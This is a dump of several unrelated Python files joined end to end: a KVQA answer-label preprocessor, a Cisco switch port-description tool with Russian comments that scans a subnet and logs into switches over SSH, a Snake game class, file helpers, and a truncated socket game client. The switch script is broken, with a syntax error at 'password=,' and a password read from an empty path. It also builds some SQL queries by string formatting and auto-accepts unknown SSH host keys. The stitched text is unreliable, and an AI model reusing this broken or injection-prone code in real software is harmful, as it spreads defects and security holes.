occurence: label2ans.append(answer) ans2label[answer] = label label += 1 utils.create_dir(cache_root) cache_file = os.path.join(cache_root, name+'_ans2label.kvqa.pkl') cPickle.dump(ans2label, open(cache_file, 'wb')) cache_file = os.path.join(cache_root, name+'_label2ans.kvqa.pkl') cPickle.dump(label2ans, open(cache_file, 'wb')) return ans2label def compute_target(answers_dset, ans2label, split, cache_root='data/cache'): """Augment answers_dset with soft score as label ***answers_dset should be preprocessed*** Write result into a cache file """ target = [] for ans_entry in answers_dset: answers = ans_entry['answers'] answer_count = {} for answer in answers: answer_ = answer['answer'] answer_count[answer_] = answer_count.get(answer_, 0) + 1 labels = [] scores = [] for answer in answer_count: if answer not in ans2label: continue labels.append(ans2label[answer]) score = get_score(answer_count[answer]) scores.append(score) img_id, _ = os.path.splitext(ans_entry['image']) target.append({ 'question_id': img_id, 'image_id': img_id, 'labels': labels, 'scores': scores }) utils.create_dir(cache_root) cache_file = os.path.join(cache_root, split + '_target.kvqa.pkl') cPickle.dump(target, open(cache_file, 'wb')) return target def get_answer(qid, answers): for ans in answers: if ans['question_id'] == qid: return ans def get_question(qid, questions): for question in questions: if question['question_id'] == qid: return question if __name__ == '__main__': dataroot = 'data' answer_file = os.path.join(dataroot, 'KVQA_annotations_train.json') with open(answer_file, encoding='utf-8') as f: train_answers = json.load(f) answer_file = os.path.join(dataroot, 'KVQA_annotations_val.json') with open(answer_file, encoding='utf-8') as f: val_answers = json.load(f) answers = train_answers + val_answers occurence = filter_answers(answers, 3) ans2label = create_ans2label(occurence, 'trainval') compute_target(train_answers, ans2label, 'train') compute_target(val_answers, ans2label, 'val') FedAnt/python-collectiongarbage/cisco-descr-port.py ########## # Скрипт для подписи портов на коммутаторах cisco # !!! Переписать ########## import socket import subprocess import ipaddress import sqlite3 import paramiko import time import os import re # ---------------------------------------------------------------------------------------------------------------------- # Parametrs # ---------------------------------------------------------------------------------------------------------------------- # задаем диапазон ip адресов, в котором будем искать коммутаторы cisco ip_range = "172.16.1.0/24" # время задержки для параметра socket timeout = 5.0 # имя БД db_name = "desc.db" # путь до папки с файлами логов авторизации РС в сети dirName = "//someserver/path_to_logs" # Количество запросов ping до ожидания ответа устройства ping_counter = 4 # пользователь для подключения по ssh usr = 'someuser' # пароль для подключения по ssh pwd = open('', 'r').read() # порт для подключения по ssh port = 22 # Данные c какой строки читать (ключ + номер строки для mac-address table) nstr = 4 + 1 # список коммутаторов, которые можно подписывать sw_list = [] # список префиксов описания портов, которые можно подписывать ltada = [] # список префиксов описания портов, которые нельзя подписывать ltadd = [] # ---------------------------------------------------------------------------------------------------------------------- # ------------------------------------------------------ Functions # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # Блок с общими функциями def set_query_for_db(query): ''' Функция выполняет произвольный SQL запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query) con.commit() con.close() def get_select_in_db_ex(query): ''' функция отправляющая в БД запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query) data = cur.fetchall() con.close() if len(data): return data def get_select_in_db_exp(query, data): ''' функция отправляющая в БД запрос ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute(query, data) data = cur.fetchall() con.close() if len(data): return data def delete_data_from_db(tb_name, id_if): ''' функция удалеяет данные из указанной таблицы БД ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute("DELETE FROM %s WHERE %s" % (tb_name, id_if)) con.commit() con.close() def insert_data_to_db(query, datas): ''' Функция записывает в SQLite данных ''' con = sqlite3.connect(db_name) con.executemany(query, datas) con.commit() con.close() def update_data_to_db(query, data): ''' Функция записывает в SQLite данных ''' con = sqlite3.connect(db_name) con.execute(query, data) con.commit() con.close() def check_mac_in_db(tb_name, mac_addr): ''' Функция, которая роверяет наличие мак адреса в базе mac from files tb_name - имя БД из которой делаем запрос mac_addr - mac адрес в формате win ('000A5E492E8B'), который ищем в БД ''' con = sqlite3.connect(db_name) cur = con.cursor() cur.execute("SELECT count() FROM '%s' WHERE mac_addr = '%s'" % (tb_name, mac_addr)) data = cur.fetchall() con.close() if data[0][0] != 0: return True else: return False def get_win_mac(mac): ''' функция для перевода мак адреса из формата cisco в формат log файлов 50e5.49ce.bb40 -> 50E549CEBB40 убирает точки и переводит в верхний регистр ''' return re.sub('\.', '', mac.upper()) def ssh_command(host, comm): ''' функция для выполнения команды на cisco ''' client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Подключаемся к коммутатору client.connect(hostname=host, username=usr, password=, port=port) # Выполняем команду stdin, stdout, stderr = client.exec_command(comm) # Вывод читаем построчно data = stdout.readlines() # Закрываем подключение к коммутатору client.close() return data def ssh_commands(host, comms): ''' функция для выполнения команды на cisco ''' client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Подключаемся к коммутатору client.connect(hostname=host, username=usr, password=, port=port) commands = "" for comm in comms: commands += comm + str('\n') channel = client.invoke_shell() stdin = channel.makefile('wb') stdout = channel.makefile('rb') stdin.write(commands) stdout.close() stdin.close() client.close() def date_to_second(t_date): ''' :param t_date: в формате "2017-05-02 10:50:16" :return: возвращает время в секундах ''' return time.mktime(time.strptime(t_date, "%Y-%m-%d %H:%M:%S")) # ---------------------------------------------------------------------------------------------------------------------- # 1 Блок по сканированию сети и записи IP адресов cisco в БД def my_ping(ip_range): ''' функция пингует диапазон IP адресов и возвращет список доступных устройств ''' # Create the network ip_net = ipaddress.ip_network(ip_range) # Get all hosts on that network all_hosts = list(ip_net.hosts()) # Configure subprocess to hide the console window info = subprocess.STARTUPINFO() info.dwFlags |= subprocess.STARTF_USESHOWWINDOW info.wShowWindow = subprocess.SW_HIDE ip_range_online = [] # For each IP address in the subnet, # run the ping command with subprocess.popen interface for i in range(len(all_hosts)): for j in range(0, ping_counter): output = subprocess.Popen(['ping', '-n', '1', '-w', '500', str(all_hosts[i])], stdout=subprocess.PIPE, startupinfo=info).communicate()[0] if ("Заданный узел недоступен" in output.decode('cp866')): None elif ("Превышен интервал ожидания для запроса" in output.decode('cp866')): None else: print(str(all_hosts[i]) + " is Online") ip_range_online.append(str(all_hosts[i])) break return ip_range_online def find_cisco_ip(ip_range_online): ''' функция по диапозону ищет устройства, которые по 22 порту отвечают фразой "SSH-2.0-Cisco-1.25" ''' ip_cisco_online = [] for i in range(len(ip_range_online)): ip_device = ip_range_online[i] # print (str(ip_device)) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock = socket.socket() sock.settimeout(timeout) sock.connect((str(ip_device), 22)) # соединяемся к порту, i - port sock.settimeout(None) except: pass else: result = sock.recv(65536) # очередная порция байтов if ("SSH-2.0-Cisco-1.25" in result.decode("utf-8")): ip_cisco_online.append(ip_device) sock.close() continue # если порт закрыт, то переходим к следующему return ip_cisco_online # !!! Переписать !!! # def insert_ip_cisco_in_db(ip_cisco_online): ''' функция принимает диапазон ip адресов проверяет на существование этих IP адресов в БД и если они отсутствуют, то записывает их в БД ''' con = sqlite3.connect(db_name) cur = con.cursor() ip_for_insert = [] j = 0 for i in range(len(ip_cisco_online)): cur.execute("SELECT * FROM tb_switches WHERE ip_addr = '%s'" % ip_cisco_online[i]) data = cur.fetchall() if not len(data): ip_for_insert.append([]) ip_for_insert[j].append(ip_cisco_online[i]) ip_for_insert[j].append("1") j += 1 con.close() con = sqlite3.connect(db_name) con.executemany("INSERT INTO tb_switches (ip_addr, status) VALUES(?, ?)", ip_for_insert) con.commit() con.close() # !!! Переписать !!! # def insert_cisco_sign_db(): # Функция получает данные по коммутаторам switches = get_select_in_db_ex("select id_switch, ip_addr, name from tb_switches where status = 1") for switch in switches: print(switch[1]) datas = ssh_command(switch[1], "show version") for data in datas: # Получаем серийный номер if data.find("Model number") + 1 > 0: mn = data.split(": ")[1].strip() # Получаем версию прошивки elif data.find("IOS (tm)") + 1 > 0: ios = data.split(",")[0].split("e (")[1][0:-1].strip() # Получаем мак адрес коммутатора elif data.find("MAC Address") + 1 > 0: mac_addr = data.split(": ")[1].strip() # Получаем время работы коммутатора elif data.find("uptime") + 1 > 0: hostname = data.split(" ")[0].strip() print(ios) print(mn) print(mac_addr) print(hostname) # Обновляем название коммутатора if switch[2] == "": update_data_to_db("UPDATE tb_switches SET name = ? WHERE id_switch = ?", (hostname, switch[0])) print("!") print("--!!!---") # ---------------------------------------------------------------------------------------------------------------------- # 2 Блок по записи данных о mac адресах, из лог файлов входа в систему, в БД def get_datas_from_files_int(): ''' получение из log-файлов данных в сети Интернет-ГХК ''' # счетчик строк i = 0 # список списков с данными l = [] # считываем список файлов names = os.listdir(dirName) for name in names: # создаем внутри списка вложенные списки l.append([]) # получаем полное имя fullname = os.path.join(dirName, name) f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # делим последную строку на список l_last_string = (re.split('\|', last_string)) # дата и время l[i].append(l_last_string[0].strip(" ").replace('/', '-') + " " + l_last_string[1].strip(" ")) # имя РС l[i].append(l_last_string[2].strip(" ")) # ip адрес РС l[i].append(l_last_string[3].strip(" ").replace(' ', '')) # mac адрес РС l[i].append(l_last_string[4].strip(" ")[4:]) un_os = l_last_string[5].strip(" ").split(' OS:') # имя пользователя l[i].append(un_os[0].split("\\")[0]) l[i].append(un_os[0].split("\\")[1]) # версия ОС (6) l[i].append(un_os[1]) # время изменения файла (7) # l[i].append(datetime.fromtimestamp(os.path.getmtime(fullname))) i += 1 f.close() return l def get_datas_from_files_kc(dir_name): # получение из log-файлов данных в КС # счетчик строк i = 0 # список списков с данными l = [] # считываем список файлов names = os.listdir(dir_name) for name in names: # создаем внутри списка вложенные списки l.append([]) # получаем полное имя fullname = os.path.join(dir_name, name) f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # print (last_string) # делим последную строку на список l_last_string = (re.split('\|', last_string)) cur_string = l_last_string[0].split(';') # дата и время l[i].append(cur_string[0]) # hostname l[i].append(cur_string[1].split('\\')[1]) # username l[i].append(cur_string[2].split('\\')[1]) # mac-address l[i].append(cur_string[3]) # IP адрес l[i].append(cur_string[4].strip(' ').replace(' ', '')) # версия ОС l[i].append(cur_string[9]) i += 1 f.close() return l def get_datas_from_file_int(f_name): ''' Функция читающая один log-файл из сети Интернет-ГХК и разбивающая последную строку на поля таблицы tb_mac_from_files f_name - имя файла, которое мы анализируем этой функцией outdata - данные собранные для записи в БД tb_mac_from_files ''' # создаем внутри списка вложенные списки outdata = [] # получаем полное имя fullname = os.path.join(dirName, f_name) # открываем файл f = open(fullname, 'r') # получаем последую строку last_string = f.readlines()[-1] # делим последную строку на список l_last_string = (re.split('\|', last_string)) # дата и время входа пользователя в систему из log-файла (0) outdata.append(l_last_string[0].strip(" ").replace('/', '-') + " " + l_last_string[1].strip(" ")) # имя РС (1) outdata.append(l_last_string[2].strip(" ")) # ip адрес РС (2) outdata.append(l_last_string[3].strip(" ").replace(' ', '')) # mac адрес РС (3) outdata.append(l_last_string[4].strip(" ")[4:]) # ФИО пользователя (4) un_os = l_last_string[5].strip(" ").split(' OS:') # l[i].append(un_os[0]) outdata.append(un_os[0].split("\\")[0]) # логин пользователя (5) outdata.append(un_os[0].split("\\")[1]) # версия ОС (6) outdata.append(un_os[1]) # время изменения log-файла (7) # outdata.append(datetime.fromtimestamp(os.path.getmtime(fullname))) f.close() return outdata def set_datas_from_file(): ''' Функция опрашивает все log-файлы из папки глобальной переменной dirName и записывает эти данные в БД, в случае если запись об этой РС есть, то обновляет данные ''' # считываем список файлов f_names = os.listdir(dirName) # пробегаемся по файлам и смотрим надо ли данные по ним обновлять или записывать по новой for f_name in f_names: # получаем данные с последней строки читаемого файла f_name data_from_f = get_datas_from_file_int(f_name) # получаем из БД (tb_mac_from_files) строку содержащую mac-адрес из файла data_from_db = get_select_in_db_exp( "select * from tb_mac_from_files where mac_addr=:mac_addr", {"mac_addr": data_from_f[3], }) if (data_from_db == None): print("Insert - {}".format(data_from_f)) insert_data_to_db(''' INSERT INTO tb_mac_from_files (date_from_file, dns_name, ip_addr, mac_addr, fio, username, os) VALUES(?, ?, ?, ?, ?, ?, ?)''', ( data_from_f,)) else: # Проверяем сколько записей в БД с таким маком как полученным из файла # Если записей больше чем одна, if (len(data_from_db) > 1): # то удаляем все старые записи и оставляем самую свежую clear_dublicate_mac(data_from_f[3]) # Проверяем даты последнего апдейта и обновляем if (date_to_second(data_from_f[0]) > date_to_second(data_from_db[0][1])): print("Update - {} - {}".format(data_from_f, data_from_db[0][0])) update_data_to_db(''' UPDATE tb_mac_from_files SET date_from_file = ?, dns_name = ?, ip_addr = ?, mac_addr = ?, fio = ?, username = ?, os = ? WHERE id_mac_from_file = ?''', ( data_from_f[0], data_from_f[1], data_from_f[2], data_from_f[3], data_from_f[4], data_from_f[5], data_from_f[6], data_from_db[0][0])) clear_dublicate_mac(data_from_f[3]) return 0 def clear_dublicate_mac(mac_addr): ''' :param mac_addr: :return: ''' # получаем из БД (tb_mac_from_files) строку содержащую mac-адрес из файла data_from_dbs = get_select_in_db_exp( "select * from tb_mac_from_files where mac_addr=:mac_addr", {"mac_addr": mac_addr, }) tmp_date = '2000-01-01 00:00:01' tmp_id = 0 if (len(data_from_dbs) > 1): for data_from_db in data_from_dbs: print(data_from_db) if (tmp_id != data_from_db[0]): if (date_to_second(tmp_date) < date_to_second(data_from_db[1])): if (tmp_id != 0): delete_data_from_db("tb_mac_from_files", "id_mac_from_file = " + str(tmp_id)) print("Delete - {} - {}".format(tmp_id, tmp_date)) tmp_id = data_from_db[0] tmp_date = data_from_db[1] else: delete_data_from_db("tb_mac_from_files", "id_mac_from_file = " + str(data_from_db[0])) print("Delete - {} - {}".format(data_from_db[0], data_from_db[1])) print("Result - {} - {}".format(tmp_id, tmp_date)) print("\n") return 0 # ---------------------------------------------------------------------------------------------------------------------- # 3 Блок по записи данных о mac адресах с устройств cisco в БД def update_desc_in_db(switch): ''' обновление подписей в БД с коммутатора :return: ''' # получаем данные о подписи портов на коммутаторах datas = sis_parser(switch[2]) # обновляем подписи в БД for data in datas: update_data_to_db("UPDATE tb_desc_on_switches SET descs = ? WHERE id_switch = ? and port_name = ?", (data[2], data[0], data[1])) return 0 def update_autodesc(switch): ''' !!! New Функция проверяющая корректность ключа поля auto_descs в таблице tb_desc_on_switches ''' # обновляем подписи на коммутаторе update_desc_in_db(switch) # Получаем строки подписей на текущем коммутаторе из БД lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) if (lports is not None): # !!! Этот блок можно переписать и справочные слова брать из БД # для каждой строки проверяем описание и если в нем встречаются знакомые слова, то for lport in lports: # в этом случае ставим флаг auto_descs = 1 lallows = get_select_in_db_ex("SELECT * FROM tb_auto_desc_allow") ldenys = get_select_in_db_ex("SELECT * FROM tb_auto_desc_deny") flag = -1 for lallow in lallows: if (lport[3].lower().find(lallow[0]) != -1): flag = 1 for ldeny in ldenys: if (lport[3].lower().find(ldeny[0]) != -1): flag = 0 if (flag != -1): update_data_to_db("UPDATE tb_desc_on_switches SET auto_descs = ? WHERE id_desc_on_switch = ?", (flag, lport[0])) else: print("Что-то явно пошло не так как задумывалось в функции update_autodesc") # return ничего не делает return 0 def set_new_desc_to_db(): ''' :return: ''' print("switches = ", sw_list) # для каждого коммутатора for switch in sw_list: # запрашиваем в БД список портов, которые можно подписывать lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id AND auto_desc = 1 ''', {"switch_id": switch[0], }) print("\nswitch = ", switch) # Если записей в БД о портах которые можно подписывать нет, if (lports is None): # то проверяем есть ли записи о портах этого коммутатора вообще в БД tports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # Если записей о портах этого коммутатора нет в БД, то if (tports is None): # считываем с коммутатора все строки по команде "sis" и # записываем в БД подписи с коммутаторов insert_data_to_db('''INSERT INTO tb_desc_on_switches (id_switch, port_name, descs, auto_desc) VALUES(?, ?, ?, ?)''', sis_parser(switch[2])) # Если записи в БД о портах которые можно подписать есть, else: # получаем данные с текущего коммутатора об активных mac адресах switch_datas = ssh_command(switch[2], 'show mac- | inc Fa0') # создаем массив с активными маками на портах, которые можно подписывать act_macs = [] # пробегаемся по mac адресам for switch_data in switch_datas: print("switch_data - ", switch_data) # флаг - найден порт из списка активных маков среди разрешенных для подписи портов из БД flag = 0 # если в списке мак таблицы есть порты, которые можно подписывать for lport in lports: # сравниваем название портов, чтобы понять есть ли в списке порт для подписи if (switch_data.split()[3] == lport[2]): flag = 1 # то добавляем в результирующую таблицу if (flag == 1): act_macs.append(switch_data.split()) print("act_macs = ", act_macs) # на выходе получаем массив act_macs = [['254', '0011.2f38.7d84', 'DYNAMIC', 'Fa0/1'], # ['254', '001f.c689.7e49', 'DYNAMIC', 'Fa0/12']] # 21 5 00C0B79FC589 Fa0/15 254 # c мак адресами и портами которые необходимо подписать for act_mac in act_macs: for lport in lports: # ищем порт среди act_mac для того чтобы сравнить дескрипшин if (act_mac[3] == lport[2]): # db_mac_sw = get_select_in_db_exp(''' SELECT * FROM tb_mac_from_switches WHERE mac_addr = :mac_addr ''', {"mac_addr": get_win_mac(act_mac[1])}) # если данных о маке текущего порта есть, if (db_mac_sw is not None): # проверяем, что в базе такая запись есть и совпадает полностью if not (get_win_mac(act_mac[1]) == db_mac_sw[0][2] and act_mac[3] == db_mac_sw[0][3]): print("--------act_mac, db_mac_sw === {} == {}".format(act_mac, db_mac_sw)) # если данные о маке текущего порта отсутствуют else: del act_mac[2] act_mac.insert(0, switch[0]) act_mac.insert(1, get_win_mac(act_mac[2])) del act_mac[3] print("Insert = ", act_mac) update_data_to_db(''' INSERT INTO tb_mac_from_switches (id_switch, mac_addr, vlan, port_name) VALUES(?, ?, ?, ?)''', act_mac) # проверяем корректность update_autodesc(switch) # ---------------------------------------------------------------------------------------------------------------------- # Попытка № 3 def sis_parser(ip_switch): datas = ssh_command(ip_switch, "sis") i = 0 l = [] for data in datas: port = data[0:10].strip(' ') # print (port.encode('ascii')) if port == "Port" or port == '\r\n': next else: l.append([]) l[i].append( str(get_select_in_db_exp("SELECT id_switch FROM tb_switches WHERE ip_addr=?", (str(ip_switch),))[0][0])) l[i].append(data[0:10].strip(' ')) # name = d[10:29].strip(' ') l[i].append(data[10:29].strip(' ')) l[i].append("0") # status = d[29:42].strip(' ') # l[i].append(data[29:42].strip(' ')) # vlan = d[42:53].strip(' ') # l[i].append(data[42:53].strip(' ')) # duplex = d[53:60].strip(' ') # l[i].append(data[53:60].strip(' ')) # speed = d[60:67].strip(' ') # l[i].append(data[60:67].strip(' ')) # type_p = d[67:].strip(' ') # l[i].append(data[67:].strip(' ')) # id_port_name = get_id_port_name(port) # l[i].append(get_id_host (ip_switch)) # id_host = get_id_host (ip_switch) # print(l[i]) # print (str(i) + " - " + port + "; id-port = " + str(id_port_name) + "; desc = " + name) i += 1 return l def update_desc_in_db2(switch): ''' обновление подписей в БД с коммутатора :return: ''' # получаем данные о подписи портов на коммутаторах datas = sis_parser(switch[2]) # получаем данные о подписях в БД lports = get_select_in_db_exp(''' SELECT * FROM tb_desc_on_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # print("lports - ", lports) # если подписи портов есть в БД, то делаем обнолвение полей if len(lports) > 0: # обновляем подписи в БД for data in datas: update_data_to_db(''' UPDATE tb_desc_on_switches SET descs = ?, f_new_desc = ? WHERE id_switch = ? and port_name = ?''', (data[2], "0", data[0], data[1])) else: # если подписи портов не записаны в БД, то вставляем новые строки insert_data_to_db('''INSERT INTO tb_desc_on_switches (id_switch, port_name, descs, auto_desc) VALUES(?, ?, ?, ?)''', sis_parser(switch[2])) return 0 def check_port_for_auto_desc(): ''' :param tlfi: :return: ''' return 0 def update_mac_in_db(switch): ''' :param switch: :return: ''' # получаем данные с текущего коммутатора об активных mac адресах sw_lmacs = ssh_command(switch[2], 'show mac- | inc Fa0') # list for insert lfi = [] for sw_lmac in sw_lmacs: # temp list for insert tlfi = [] tlfi.append(switch[0]) tlfi.append(get_win_mac(sw_lmac.split()[1])) tlfi.append(sw_lmac.split()[3]) tlfi.append(sw_lmac.split()[0]) tlfi.append("1") if check_port_for_auto_desc(tlfi): lfi.append(tlfi) print("lfi - ", lfi) # получаем данные из БД о имеющихся mac адресах db_lmacs = get_select_in_db_exp(''' SELECT * FROM tb_mac_from_switches WHERE id_switch = :switch_id ''', {"switch_id": switch[0], }) # print("db_lmacs - ", db_lmacs) return 0 def update_switch_data_in_db(): ''' Главная функция выполняющая все действия блока :return: ''' # Пробегаемся по коммутаторам for switch in sw_list: print("\nswitch - ", switch) # Обновляем данные sis update_desc_in_db2(switch) # Обновляем данные sma update_mac_in_db(switch) return 0 # ---------------------------------------------------------------------------------------------------------------------- # 4 Блок по подготовке новых подписей для устройств def get_new_description_from_port(datas): ''' функция получает массив списков по формату представления vw_summary и преобразовывает старые подписи в новые для дальнейшей записи их в БД data[1] - id_switch data[3] - имя порта (номер порта в формате Fa0/1) data[7] - текущая подпись порта data[11] - последнее название АРМ зарегистрированное с отображаемым мак адресом в папке transit data[18] - ip-адрес коммутатора data[19] - статус коммутатора (включен или выключен) data[20] - ключ по которому определяем можно производить автоподпись портов или нет ''' i = 0 # создаем список l = [] # получаем список списков коммутаторов for data in datas: # print("{} - {}".format(data[20], data)) # проверяем, что данный коммутатор можно подписывать автоматически if data[20]: # проверяем, что на порту нет надписи Хаб if data[7].lower().find('hub') < 0: # проверяем, что порт подписан в нужном формате с разделителем "|" # (<номер кабинета>-<номер розетки в помещении>|<АРМ>) if len(data[7].split('|')) > 1: # проверяем что имя АРМ не совпадает и подписываем, иначе порт считаем подписанным верно if data[7].split('|')[1] != data[11]: room = data[7].split('|')[0] + '|' + data[11] # иначе все подписано верно else: room = data[7] # если порт имеет произвольную подпись, то else: # ищем совпадение по формату (r.303-1r Y) result = re.findall(r'(\b[r](\b[\.])*\d{3}(\b[-]\d{1})*([r|l|R|L])*([ Y])*)', data[7]) # Если нашли совпадение по формату, то if len(result): # приводим номер помещение к общему виду room = result[0][0].lstrip('r').strip().strip('.').upper() # если помещение не дописано и имеет только 3 цифры, то if len(room) <= 3: # дописываем -??, что бы получить общий вормат room = room + '-00' # заносим данные в таблицу БД room = room + '|' + str(data[11]) # если совпадение по формату не нейдено else: # ищем более свежий формат состоящий из 3х первых цифр result = re.findall(r'(\d{3}\b[-]\d{1}[r|l|R|L])+(\b[./]\d{1})*', data[7]) # проверяем, что нашли новый формат if len(result): # состоит он только из цифр if len(result[0][0]) > 0: room = result[0][0] # или ему еще можно подписать номер розетки if len(result[0][1]) > 0: room = room + str(result[0][1]) # заносим данные в таблицу БД room = room + '|' + str(data[11]) # если ничего не нашли по номерам помещений то вносим формат из нулей else: # заносим данные в таблицу БД room = '000-00|' + str(data[11]) # если хаб присутствует, то else: # текущую подпись порта переводим в верхний регистр room = data[7].upper() # создаем внутри списка вложенные списки со строками l.append([]) # id_switch l[i].append(data[1]) # имя порта который мы хотим подписать l[i].append(data[3]) # ip-адрес коммутатора l[i].append(data[18]) # статус коммутатора (включен или выключен) # l[i].append(data[19]) # ключ по которому определяем можно производить автоподпись портов или нет # l[i].append(data[20]) # новая подпись l[i].append(room) i += 1 return l # ---------------------------------------------------------------------------------------------------------------------- # 5 Блок по внесению новых подписей на коммутаторы def put_new_descr_switch(): ''' Функция проверяет таблицу tb_new_desc на наличие новых подписей коммутаторов и вносит изменения в коммутатор ''' # получаем список коммутаторов datas = get_select_in_db_ex(''' SELECT id_switch, ip_addr, count(id_switch) FROM tb_new_desc GROUP BY id_switch''') for data in datas: print("\n---" + str(data) + "---") ssh_commands(data[1], get_commond_line(data)) def get_commond_line(switch): ''' Функция подготавливает массив комманд для конкретного коммутатора ''' qs = get_select_in_db_exp(''' SELECT *, count(port_name) FROM tb_new_desc WHERE id_switch=? GROUP BY id_switch, port_name''', (switch[0],)) print("qs - {}".format(qs)) l = [] l.append("conf ter") for q in qs: if q[6] < 2: l.append("int " + q[2]) l.append("desc " + q[4]) l.append("exit") if len(l) > 1: l.append("exit") l.append("wr") l.append("exit") # очищаем БД от записей, которые передаем на подпись коммутаторов for q in qs: print("Удаляем строку - {}".format(q)) update_data_to_db("UPDATE tb_new_desc SET f_new_desc = ? WHERE id_new_desc = ?", ("1", q[0])) # delete_data_from_db("tb_new_desc", "id_new_desc = " + str(q[0])) return l # ---------------------------------------------------------------------------------------------------------------------- # -------------------------------------------------------MAIN # ---------------------------------------------------------------------------------------------------------------------- # ---------------------------------------------------------------------------------------------------------------------- # 1--- Блок по сканированию сети и записи IP адресов cisco в БД print(" - Сканирую подсеть " + str(ip_range)) # получаем список ip-адресов доступных по ICMP из диапазона ip_range ip_range_online = my_ping(ip_range) # отсеиваем все устройства, кроме cisco ip_cisco_online = find_cisco_ip(ip_range_online) # записываем в БД все IP адреса устройств, которые отозвались как cisco insert_ip_cisco_in_db(ip_cisco_online) # получаем список коммутаторов с которыми в дальнейшем будем работать print("Получаем из БД список коммутаторов с которыми будем работать ") # sw_list = get_select_in_db_ex("SELECT * FROM tb_switches WHERE status = 1 and auto_desc = 1") sw_list = get_select_in_db_ex("SELECT * FROM tb_switches WHERE status = 1 and auto_desc = 1 and id_switch = 2") print(sw_list) ltada = get_select_in_db_ex("SELECT * FROM tb_auto_desc_allow") ltadd = get_select_in_db_ex("SELECT * FROM tb_auto_desc_deny") # ---------------------------------------------------------------------------------------------------------------------- # 2--- Блок по записи данных о mac адресах, из лог файлов входа в систему, в БД # print("\n --- Модуль 2 - считывание лог файлов") # print(" - Сканирую файлы логов из папки " + str(dirName)) # set_datas_from_file() # Обновление учетных данных коммутатора (серийный номер, имя, версия прошивки) # insert_cisco_sign_db() # ---------------------------------------------------------------------------------------------------------------------- # 3--- Блок по считыванию подписей и mac адресов с портов cisco в БД print("\n --- Модуль 3 - считывание подписей и mac адресов") # Считываем данные с коммутаторов и обновляем подписи портов в БД. update_switch_data_in_db() # ----------------------------------------------- # set_new_desc_to_db() # ---------------------------------------------------------------------------------------------------------------------- # 4--- Блок по сравнению данных в БД о подписях устройств и внесение новых подписей # print("\n --- Модуль 4 - подготовка данных для подписи портов на коммутатороах") # datas = get_new_description_from_port(get_select_in_db_ex("SELECT * FROM vw_summary")) # insert_data_to_db("INSERT INTO tb_new_desc (id_switch, port_name, ip_addr, descs) VALUES(?, ?, ?, ?)", datas) # Чистим дубли по подписям портов # set_query_for_db( ''' delete from tb_new_desc where id_new_desc in ( SELECT id_new_desc FROM vw_dup_desc ) ''' # ) # ---------------------------------------------------------------------------------------------------------------------- # 5--- Блок по внесению новых подписей на коммутаторы # print("\n --- Модуль 5 - подпись портов коммутаторов") # put_new_descr_switch() import pygame, random from pygame.rect import Rect class Snake(): def __init__(self, x, y, width, dir): self.moved = False self.length = 3 self.width = width self.color = (0, 255, 0) self.dir = (1, 0) self.pos = [[x, y], [x-self.width, y], [x-(self.width*2), y]] def draw(self, screen): for i in range(self.length): pygame.draw.rect(screen, self.color,(self.pos[self.length - 1 - i][0], self.pos[self.length - 1 - i][1], self.width, self.width)) def move(self, screen): prev_move = [self.pos[0][0], self.pos[0][1]] self.pos[0][0] += self.dir[0] * self.width self.pos[0][1] += self.dir[1] * self.width self.moved = True if not 0 - self.width < self.pos[0][0] < screen.get_width() or not 0 - self.width < self.pos[0][1] < screen.get_height(): return True for i in range(self.length): if self.pos[self.length - 1 - i] != self.pos[1]: if self.pos[self.length - 1 - i] != self.pos[0]: self.pos[self.length - 1 - i] = self.pos[self.length - 2 - i] else: if self.pos[0] != self.pos[1]: self.pos[1] = prev_move else: return True if self.length - 1 - i != 0 and self.pos[0] == self.pos[self.length - 1 - i]: return True return False def turn(self, dir): if self.dir != (-dir[0], -dir[1]) and self.moved: self.dir = dir self.moved = False def eat(self): self.pos += [[self.pos[self.length - 1][0] - self.dir[0] * self.width, self.pos[self.length - 1][1] - self.dir[1] * self.width]] self.length += 1koravel/friends_displayer import os __root_location = os.path.dirname(os.path.abspath(__file__)) def get_root_location(): return __root_location GoodAI/distributed_es import tempfile from pathlib import Path class TempFile(tempfile.TemporaryDirectory): """Creates context with temp file name in a temporary directory, deletes the dir after exiting the context returns the file """ def __init__(self, filename: str): super().__init__() self.file = Path(self.name) / filename def __enter__(self): super().__enter__() return self.file def __exit__(self, exc, value, tb): super().__exit__(exc, value, tb) class TempFileName(TempFile): """Creates context with temp file name in a temporary directory, deletes the dir after exiting the context returns name of the file """ def __enter__(self): return str(super().__enter__())#! /usr/bin/python # -*- coding: utf-8 -*- """My general client framework.""" import threading import socket from message import Message import network_utils as nu class GameClient: def __init__(self, server_address): self.server_address = server_address self.observers = [] self._running = threading.Event() try: self.socket = socket.create_connection(server_address) except ConnectionError as e: print(f'| [Client] {e}') print(f'| [Client] cannot connect to server {self.server_address}') return else: print(f'| [Client] connected to server {self.server_address}') self.client_address = self.socket.getsockname() self.receiver_thread = threading.Thread(target=self._receiver_main) self._running.set() self.receiver_thread.start() def send_message(self, msg: Message): if not self.running: return msg_bytes = msg.to_bytes() try: nu.send_message(self.socket, msg_bytes) except ConnectionError as e: print(e) self.shutdown() def register_observer(self, observer): self.observers.append(observer) @property def running(self): return self._running.is_set() def _receiver_main(self): while self.running: try: resp_data = nu.recv_message(self.socket) except ConnectionError as e: print(f'| [Client] {e}') break resp = Message.from_bytes(resp_data) for observer in self.observers: observer(resp) print(f'| [Client] client receiver stopped') def shutdown(self): self._running.clear() self.socket.close() print(f'| [Client] disconnected from server {self.server_address}') class StatefulGameClient(GameClient): def __init__(self, server_address, state): super().__init__(server_address) self.state = state self.register_observer(self.update_client_state) def 